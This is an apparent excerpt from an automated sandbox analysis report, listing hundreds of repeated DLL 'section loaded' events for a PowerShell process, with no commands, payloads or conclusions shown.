                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
